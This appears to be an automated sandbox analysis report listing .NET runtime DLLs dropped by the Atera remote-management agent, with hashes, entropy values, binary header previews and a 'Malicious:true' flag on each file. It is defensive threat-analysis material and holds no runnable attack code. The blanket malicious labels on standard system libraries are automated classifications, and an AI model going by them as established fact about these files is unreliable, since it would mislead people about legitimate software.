                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Handles.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.873604958411169
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:688cIIWNoWJiNyb8E9VF6IYijSJIVxJtxKOH:69cU7iEpYi605vH
                                                                                                                                                                                                                                                                                                                                  MD5:92C4D6208EEC6CABC33CC56784909697
                                                                                                                                                                                                                                                                                                                                  SHA1:6DBBB3A648EB5982266508FA2E71F423CAC2A249
                                                                                                                                                                                                                                                                                                                                  SHA-256:103106DB7BED940F07BDCD89418DE4E4665B63088970E1B4A522A95A90175A63
                                                                                                                                                                                                                                                                                                                                  SHA-512:7D59C7D0F9F5DE09714942A4C07EB79A4103F4D3AFF7DFF4A4FBF57BBDD14326FF4ED121ED0D2FCE0EF42F29FD51ED63394D1DC21528BDF587401EA78DBBE813
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0.............V)... ...@....... ....................................@..................................)..O....@..................((...`.......'............................................... ............... ..H............text...\.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................8)......H.......P ......................L'......................................BSJB............v4.0.30319......l.......#~.. .......#Strings............#US.........#GUID...........#Blob......................3..................................................*.....*...c.....J.....w.................v.....,.....E.................`.....I...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):22568
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.618472083456871
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:okUwx9rm5go1fWKmmW4oqN5dWjaWbJNyb8E9VF6IYijSJIVxowXgjv:3rmoFmWXX/NEpYi60b+v
                                                                                                                                                                                                                                                                                                                                  MD5:634BE9D1097EF4CA02DA4A494C739543
                                                                                                                                                                                                                                                                                                                                  SHA1:A1838872C292FE37997E73236D66DBAB62608C8D
                                                                                                                                                                                                                                                                                                                                  SHA-256:584C915710C8BCF9AD1DBB0452A33584C6F30D63A7EEA45E4448CF020BD3D91D
                                                                                                                                                                                                                                                                                                                                  SHA-512:90335988DD4E083CDAAD5E1E99BB7C1F8D139E080D056DF25C36CE4B02380A328293C976D86FD41108871E69A42805D331BA5715C1B8542DB5F7B9B585FC7DBB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..&...........E... ...`....... ..............................\.....@.................................PE..O....`..x............0..((...........D............................................... ............... ..H............text....%... ...&.................. ..`.rsrc...x....`.......(..............@..@.reloc..............................@..B.................E......H........$...............A.......C......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2r/..p.(....*......(....*2(.....(....*^~....-.(.........~....*.0..........~..........(.........(....-Y..(!....{/......5..,

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.InteropServices.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18472
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.6714552970476415
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:g09bOAghbsDCyVnVc3p/i2fBVlAO/BRU+psbC984vmJHrE1dtx66aI2sU52RWVsN:5OAghbsDCyVnVc3p/i2fBVlAO/BRU+pn
                                                                                                                                                                                                                                                                                                                                  MD5:7FCF27F025DAB00D87C51B76637C5279
                                                                                                                                                                                                                                                                                                                                  SHA1:951D205AFF43E57F62BF645670F20F5F82C5353B
                                                                                                                                                                                                                                                                                                                                  SHA-256:EA4CF899D1CDFB05792DE2165DD5EACC811782620FA580FF17100199A45D67B9
                                                                                                                                                                                                                                                                                                                                  SHA-512:7E4A6A8460885C3A35407C2317E3318BF55956524641E7C8A43C4E3DF4D79EF50CACFE485F067FE2F53A6E3F66CFCEE46F9094E55FC1DE0B634BBB8B2A001027
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............r5... ...@....... ..............................%.....@................................. 5..O....@..P............ ..((...`.......3............................................... ............... ..H............text...x.... ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B................T5......H.......P ......................h3......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3................................r.....................e...........4.................3.....L...................................R...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;. ...C.;...K.[...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Numerics.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.826724974873829
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:192:cNYx4AW6RW5wPSNyby2sE9jBF6IYiYF85S35IVnxGUHFt7kRF885W:r7W6RWmaNyb8E9VF6IYijSJIVxZ758w
                                                                                                                                                                                                                                                                                                                                  MD5:B1C25A0FEB993D093CBA04D095087ED4
                                                                                                                                                                                                                                                                                                                                  SHA1:7DDEF47BD1B90CE1881CF22C143697B1D8843FDF
                                                                                                                                                                                                                                                                                                                                  SHA-256:E6FDB2BBBE0B7D4740B204708B95084AF8421A49E1736F1A7011C3A2E7656FBD
                                                                                                                                                                                                                                                                                                                                  SHA-512:B510D1F32BF419B19473FB3FC6D244727D47458DF42A427F0FB97EAF167A3D2B04B74DC42FE6FC0DA6866BEF9D91FA285D6D30E1BF6838545D3E5D26320AF098
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................w.....@.................................T(..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l.......#~......4...#Strings....(.......#US.,.......#GUID...<.......#Blob......................3......................................z...............\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Formatters.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.92167020492551
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:1I5HeWFwTBsWWcNyb8E9VF6IYijSJIVxuKAjbz:1I5HFwTBI8EpYi60luz
                                                                                                                                                                                                                                                                                                                                  MD5:BB8FAAA42681D198714A146CD9D76964
                                                                                                                                                                                                                                                                                                                                  SHA1:598BFF20869B63315406758DBDD469E61BC3E2DF
                                                                                                                                                                                                                                                                                                                                  SHA-256:AC1C3F597F3DE8B16F50DBCB199D7A4FE03480BC2FCC6A5DFB926DBA1E6D8312
                                                                                                                                                                                                                                                                                                                                  SHA-512:6A969EDFFA18F892ECDAD676C5447970260FE38AF4A1FA249B65889C628C806ECE5D4A73EE861D14594E6EEE4B22D416443008C091B3B13F2496A2E2E6BD0C6C
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ...................................@.................................|)..O....@..................((...`......D(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P ..t....................'......................................BSJB............v4.0.30319......l.......#~..H.......#Strings....@.......#US.D.......#GUID...T... ...#Blob......................3............................................................U.x...........................~.....4.....M.................h.....$...................r.....r.....r...).r...1.r...9.r...A.r...I.r...Q.r...Y.r...a.r...i.r...q.r.......................#.....+.....3.....;.)...C.D...K.d...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Json.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.890945015945684
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:EAJpVWbfkBnWRXNyb8E9VF6IYijSJIVxngx7:EAJpWfkBAbEpYi60i7
                                                                                                                                                                                                                                                                                                                                  MD5:ED75A2535E51C83194EB1970B9590BA7
                                                                                                                                                                                                                                                                                                                                  SHA1:C061F123CBB2543A0539662D5515B26484C93CF9
                                                                                                                                                                                                                                                                                                                                  SHA-256:0908E236E5F1DBDBB14EEC9CEB173D3B3359AA7D2972CB8E0ACA54A5BACDC1BA
                                                                                                                                                                                                                                                                                                                                  SHA-512:25763A8398677EE6CFE06F757C902F617CED04F98CABF942491DCFFE7CE32DEBBA30A4D0C64517FF5265FAA7B86E568B84147CCF045D459ED027F1A7B84E11B5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............>)... ...@....... ....................................@..................................(..O....@..`...............((...`.......'............................................... ............... ..H............text...D.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................ )......H.......P ......................4'......................................BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob......................3......................................z...........@...\.@...0.-...`.....D.................C.................[.....x.....-.........................'.....'.....'...).'...1.'...9.'...A.'...I.'...Q.'...Y.'...a.'...i.'...q.'.......................#.....+.....3.....;.#...C.>...K.^...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):21032
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.539966661191908
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:+8R71h7yzt94dHWFgQBVWeHWFyTBVW2dNyb8E9VF6IYijSJIVxRNOKL:r1dyAqgQBfqyTBZZEpYi607L
                                                                                                                                                                                                                                                                                                                                  MD5:B5EA34DA9CF35DE0D95BA9DA17B01701
                                                                                                                                                                                                                                                                                                                                  SHA1:C22637BD8E9DFE75E040F6E8D26324AE53F35614
                                                                                                                                                                                                                                                                                                                                  SHA-256:A8B3EB5CAB67FF34B4613CEA5A1953DB244F97F7A58FDD7419AE8E78C2B31F89
                                                                                                                                                                                                                                                                                                                                  SHA-512:46851C8D0A38AA09277DF85F2A44ACADA4803217B6BA98C4D5D35CE97C7297334EA3198525489D002F1731CD0B50B9574F3E6F6C10DF4C3553476261E84B7DD5
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............8... ...@....... ..............................{.....@..................................8..O....@..8............*..((...`.......7............................................... ............... ..H............text........ ...................... ..`.rsrc...8....@......................@..@.reloc.......`.......(..............@..B.................8......H.......|!..l............1..p...X7......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*......(....*..BSJB............v4.0.30319......l.......#~..h.......#Strings....\...4...#US.........#GUID...........#Blob...

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.Serialization.Xml.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):18984
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.683190581384528
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:wpsBljcZQIVI8CNwbcyMWs4oBOW9MWG4tBOWb8Nyb8E9VF6IYijSJIVxZ8oC83/:ysPMQMI8COYyi4oBNw4tBrcEpYi605/
                                                                                                                                                                                                                                                                                                                                  MD5:9241525E779DDD7D0AA0D804A9B45671
                                                                                                                                                                                                                                                                                                                                  SHA1:21711DB0394F1260C59EC46836CD65B2B1790281
                                                                                                                                                                                                                                                                                                                                  SHA-256:F2FFBA2BB2E684236F6ACDD8EDBD8D7A177CD9985F2C69D8410894D99E1C0E91
                                                                                                                                                                                                                                                                                                                                  SHA-512:D08595BC14CA37BDC9CFB137016FA19A243116CC9BF11BF522D62A5D443E6F8D4DF1D1A1557C5C3784508AE714CD79F7F09BAE2E1ADCF3EF5126A73FB181F1FB
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............3... ...@....... ...............................Q....@..................................3..O....@..............."..((...`.......2............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................3......H........!..0...................L2.......................................s....*..s....*..0...........o....u......,..o....*.*.0..%........s..........(....r...p.$o......o....*:.(......}....*..{....*.(....z.(....z6.{.....o....*:.{......o....*.(....z:.{......o....*.(....z.(....z.BSJB............v4.0.30319......l.......#~.. .......#Strings....$...0...#US.T.......#GUID...d.......#Blob...........W..........3............................................................................

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Runtime.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):23592
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.319004907808474
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:zbhigwLAuZtM66g/Id7WVXWgvNyb8E9VF6IYijSJIVxdTUFbHI:zbhzkKs9TEpYi60iI
                                                                                                                                                                                                                                                                                                                                  MD5:B1FCFD095D5796C0A87F64DA7DDDE3BE
                                                                                                                                                                                                                                                                                                                                  SHA1:4E2EF2BB3086EF6DAABC06C4F9A1A225E31A468A
                                                                                                                                                                                                                                                                                                                                  SHA-256:4DEBFA817B9250DC70BFF9C59E875E87FB01C9634A89EAB00277807DB2F22A8A
                                                                                                                                                                                                                                                                                                                                  SHA-512:8BB87EEFF323D18425936E9D8EA0AF1491D5E2096152313EDD02E380BF9DC809FC1B49E0CDD906ECF6174FF4D6B4882C8BF3F43FDBB73DA094CF01314B5D6750
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A..Y.........." ..0..*.........."H... ...`....... ....................................@..................................G..O....`...............4..((...........F............................................... ............... ..H............text...((... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B.................H......H.......P ...%...................F......................................BSJB............v4.0.30319......l.......#~..........#Strings.....#......#US..#......#GUID....#......#Blob......................3................................................_.........................8.....8...*.8.....8.....8.....8.....8.....8.........*.8.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.+...K.K...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Claims.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.865758362646305
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:zUcX6W9aWTmNyb8E9VF6IYijSJIVx7y57f:zUchXuEpYi60c
                                                                                                                                                                                                                                                                                                                                  MD5:5B1256F37C5C54779867277088479340
                                                                                                                                                                                                                                                                                                                                  SHA1:D284C41E991C2B20A23943161E4ECA25D2FFEA2A
                                                                                                                                                                                                                                                                                                                                  SHA-256:6A7CA29868434B70F1441A21FF77AA9C1948291EE9EE4CFBF78C41B18962B137
                                                                                                                                                                                                                                                                                                                                  SHA-512:8F4DA4632250B95C7B1F10DCC2214B203BC54D0F3833DA669B71F496F956A8D060C9A40BEBF367774003AD66507509BE8A358E110CCD0BA8015CED3705FC22A7
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............B)... ...@....... ..............................F2....@..................................(..O....@..................((...`.......'............................................... ............... ..H............text...H.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................$)......H.......P ......................8'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID...........#Blob......................3......................................................\.....0.....(.....D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Algorithms.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):41000
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.950664026032762
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:koBj7kS+8mjvHTeaWKs0Sd4eeUAEpYi60x:zPmb9WKs0PeeUJ764
                                                                                                                                                                                                                                                                                                                                  MD5:C5746582261786391320712E78B370B1
                                                                                                                                                                                                                                                                                                                                  SHA1:EFAA2CFF8D95E7C1BA47F93A10373BBE07406323
                                                                                                                                                                                                                                                                                                                                  SHA-256:27CA1FAF9CD6A1307B271256FF77F8504D5CEAFFC53559DE918D8D1E570ADC5E
                                                                                                                                                                                                                                                                                                                                  SHA-512:64CA47E2EFB9F2D00925D410BD8F5A5E29485203432875333BE871B7A27FD87D7D2943977F2004E988E383DD62D6476BF35B5BC560F7799600428CA910682010
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..h.............. ........... ....................................@.................................u...O.......8............x..((........................................................... ............... ..H............text....f... ...h.................. ..`.rsrc...8............j..............@..@.reloc...............v..............@..B........................H.......P'..\8..........._...%..,.......................................j~....%-.&(F...s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*2r...p.(....*2rI..p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r...p.(....*2r9..p.(....*2rm..p.(....*2r...p.(....*2r...p.(....*2r=..

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Csp.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.893301124202397
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:KTI2pWPzWmWeNyb8E9VF6IYijSJIVxWxypSK:KE3bnEpYi60ppl
                                                                                                                                                                                                                                                                                                                                  MD5:A614DB2C8BF5555E786DBF7B0A38CF0F
                                                                                                                                                                                                                                                                                                                                  SHA1:5F335B455E558154CAF074CF4AD9702EC9C45562
                                                                                                                                                                                                                                                                                                                                  SHA-256:84E9EE9B96C5D02BD179D849C00BC1B39F3F4D92CA2F8935802E14D7A8E6B895
                                                                                                                                                                                                                                                                                                                                  SHA-512:773EAE05C9257A4EDC172D175DA6CB3F84598FD75B61EF1D16BFAD97365A68E6A0A442BA544C13521E3CE08ACB812ABFEF0B65E8FEFD35651A4B2437FFA293AE
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............^)... ...@....... ...............................U....@..................................)..O....@..`...............((...`.......'............................................... ............... ..H............text...d.... ...................... ..`.rsrc...`....@......................@..@.reloc.......`......................@..B................@)......H.......P ......................T'......................................BSJB............v4.0.30319......l.......#~..,.......#Strings............#US.........#GUID...........#Blob......................3......................................z...........A...\.A...0.....a.....D.................C.................[.....x.....-.........................(.....(.....(...).(...1.(...9.(...A.(...I.(...Q.(...Y.(...a.(...i.(...q.(.......................#.....+.....3.....;."...C.=...K.]...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Encoding.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15400
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.9112351802090055
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:384:zcezoy4W04WGINyb8E9VF6IYijSJIVxmMd:zBzoy+kgEpYi60r
                                                                                                                                                                                                                                                                                                                                  MD5:2166A9DA060E87521796C7F2F72D13C7
                                                                                                                                                                                                                                                                                                                                  SHA1:BC9D4036440763B3A4194181B1B7D486270A8E7D
                                                                                                                                                                                                                                                                                                                                  SHA-256:528960357AADA1464CDD32F77B074FBA71461E557A657B1C7775B107023E2ED4
                                                                                                                                                                                                                                                                                                                                  SHA-512:664D6CE3407023495E3B17FC96206D98D168BB5D55D7FD92A13ED2A57AFCDFA27EE3A2D7B2BB1318AD00D74D1013F9743ED0BD2986139D052FD95C9B8B36A50E
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0.............~)... ...@....... ...................................@.................................,)..O....@..................((...`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................`)......H.......P ..$...................t'......................................BSJB............v4.0.30319......l.......#~..<.......#Strings............#US.........#GUID....... ...#Blob......................3..................................................f...o.f...C.S.........W.................V...........%.....n...........@.....)...................M.....M.....M...).M...1.M...9.M...A.M...I.M...Q.M...Y.M...a.M...i.M...q.M.......................#.....+.....3.....;.'...C.B...K.b...S.

                                                                                                                                                                                                                                                                                                                                  C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageOsUpdates\System.Security.Cryptography.Primitives.dll

                                                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):15912
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.796205980673916
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
